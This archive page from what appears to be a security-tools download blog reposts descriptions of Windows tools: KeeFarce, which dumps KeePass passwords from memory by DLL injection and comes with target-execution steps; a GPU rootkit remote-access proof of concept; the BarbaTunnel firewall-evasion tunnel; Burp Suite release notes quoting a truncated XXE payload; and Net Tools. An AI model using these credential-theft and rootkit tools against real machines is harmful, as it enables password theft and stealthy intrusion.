Category Archives: Windows

KeeFarce – Extracts Passwords From A Keepass 2.X Database From Memory

Download
KeeFarce allows for the extraction of KeePass 2.x password database information from memory. The cleartext information, including usernames, passwords, notes and url’s are dumped into a CSV file in %AppData%

General Design

KeeFarce uses DLL injection to execute code within the context of a running KeePass process. C# code execution is achieved by first injecting an architecture-appropriate bootstrap DLL. This spawns an instance of the dot net runtime within the appropriate app domain, subsequently executing KeeFarceDLL.dll (the main C# payload).

The KeeFarceDLL uses CLRMD to find the necessary object in the KeePass processes heap, locates the pointers to some required sub-objects (using offsets), and uses reflection to call an export method.

Prebuilt Packages

An appropriate build of KeeFarce needs to be used depending on the KeePass target’s architecture (32 bit or 64 bit). Archives and their shasums can be found under the ‘prebuilt’ directory.
Executing

In order to execute on the target host, the following files need to be in the same folder:

BootstrapDLL.dll
KeeFarce.exe
KeeFarceDLL.dll
Microsoft.Diagnostic.Runtime.dll

Copy these files across to the target and execute KeeFarce.exe

Building

Open up the KeeFarce.sln with Visual Studio (note: dev was done on Visual Studio 2015) and hit ‘build’. The results will be spat out into dist/$architecture. You’ll have to copy the KeeFarceDLL.dll files and Microsoft.Diagnostic.Runtime.dll files into the folder before executing, as these are architecture independent.
Compatibility

KeeFarce has been tested on:

KeePass 2.28, 2.29 and 2.30 – running on Windows 8.1 – both 32 and 64 bit.

This should also work on older Windows machines (win 7 with a recent service pack). If you’re targeting something other than the above, then testing in a lab environment before hand is recommended.
Acknowledgements

Sharp Needle by Chad Zawistowski was used for the DLL injection tesh.
Code by Alois Kraus was used to get the pointer to object C# voodoo working.

License

BSD License, see LICENSE file

FacebookTwitterGoogle+Share

firewall evasion – BarbaTunnel

download

BarbaTunnel is software that helps you to bypass firewall and internet censorship, it is a Peer to Peer tunnel so you need a server outside of firewall network. In most case you can simply use VPN or any proxies but when you use VPN, firewall knows that you use a VPN, it does not know what you do, VPN and some other proxies does not hide their fingerprint. BarbaTunnel is a layer on your network and try to make existing VPN packets look at traditional packets. Actually BarbaTunnel does not work alone and it work with VPN. So if you have VPN and you don’t have any issue with it, you do not need BarbaTunnel, but if the firewall blocks your VPN connection or your VPN connection speed decreased by firewall, BarbaTunnel may helpful for you.

Attention: BarbaTunnel is not standalone tunnel and you should run a tunnel application or use a standard VPN connection after running BarbaTunnel.

BarbaTunnelMonitor

BarbaTunnel requires .NET Framework 4.5 for “Barba Monitor” and “Barba Service”, but BarbaTunnel.exe does not need .NET Framework, so you can run it manually on both client and server side without .NET Framework.
Configure Server

Login to your Windows Server.
Download BarbaTunnel and extract it.
Open “barbatunnel.ini” in BarbaTunnel folder and set “ServerMode=1”
Go to BarbaTunnel folder and open “config\servername” folder then open “HTTP-Retunnel.ini” file.
Set “ServerAddress” to your server ip address (required).
Run “Install.vbs”
Run “Run.Vbs”
Server already configured for specific ports, for custom configuration see “config.ini”.
Configure Client Machine

Login to your Windows Client.
Download BarbaTunnel and extract it.
Copy “config” folder and its config files that you have already created them in the server machine.
Run “Install.vbs”
Run “Run.Vbs”
Try to establish a VPN connection to your server
Remarks

It is recommended to rename “servername” folder to your server name or server ip (optional).
Ensure the major version of BarbaServer and BarbaClient is same. Such 1.0 and 1.1
Make sure both server config file and client config file is same.
Make sure the enterprise firewall does not block tunnel ports.
Make sure your Local Firewall such as Windows Firewall does not block tunnel ports or BarbaTunnel.
Make sure you have access to reboot your system if you lose the connection to your server, before run BarbaTunnel you can create a timer-job to restart your server if you have limited access to your server reboot.

FacebookTwitterGoogle+Share

Pentest tools – Burp Suite Professional v1.6.23

Burp Suite contains the following key components:
An intercepting Proxy, which lets you inspect and modify traffic between your browser and the target application.
An application-aware Spider, for crawling content and functionality.
An advanced web application Scanner, for automating the detection of numerous types of vulnerability.
An Intruder tool, for performing powerful customized attacks to find and exploit unusual vulnerabilities.
A Repeater tool, for manipulating and resending individual requests.
A Sequencer tool, for testing the randomness of session tokens.
The ability to save your work and resume working later.
Extensibility, allowing you to easily write your own plugins, to perform complex and highly customized tasks within Burp.

Burp is easy to use and intuitive, allowing new users to begin working right away. Burp is also highly configurable, and contains numerous powerful features to assist the most experienced testers with their work.
scanner_1
Release Notes

v1.6.23

This release adds a new scan check for external service interaction and out-of-band resource load via injected XML doctype tags containing entity parameters. Burp now sends payloads like:

%f5a30; ]>

and reports an appropriate issue based on any observed interactions (DNS or HTTP) that reach the Burp Collaborator server.

The release also fixes some issues:

Some bugs affecting the saving and restoring of Burp state files.
A bug in the Collaborator server where the auto-generated self-signed certificate does not use a wildcard prefix in the CN. This issue only affects private Collaborator server deployments where a custom SSL certificate has not been configured.

FacebookTwitterGoogle+Share

windows – jellyfish gpu r.a.t. (rootkit)

download
Developers of team Jellyfish  have posted a PoC of a portable executable gpu remote access tool. They already posted a linux version earlier this week.

Tapping an infected computer’s GPU allows malware to run without the usual software hooks or modifications mallware makes in the operating system kernel. Those modifications can be dead giveaways that a system is infected.

Advantages of gpu stored rootkits:

  • No gpu malware analysis tools available on web
  • Can snoop on cpu host memory via DMA
  • Gpu can be used for fast/swift mathematical calculations like xor’ing or parsing
  • Stubs
  • Malicious memory may be retained across warm reboots. (Did more conductive research on the theory of malicious memory still being in gpu after shutdown)

It is just a mather of time untill a version emerge that runs on graphics processors integrated into CPUs.

FacebookTwitterGoogle+Share

windows – net tools 5.0.70

download

Description

Net Tools is a comprehensive set of host monitoring, network scanning, security, administration tools and much more, a real swiss knife. The tools range from ip port scanners to Google PageRank Calculator’s.

Installation

Extract the zip file and right-click on the setup.exe and go to properties. Change the compatibility mode to Windows XP (Service Pack 3) and enable Run as Administrator:
nettools setup.exe properties

After this just start the setup.exe and click a few times on next.

Continue reading windows – net tools 5.0.70

FacebookTwitterGoogle+Share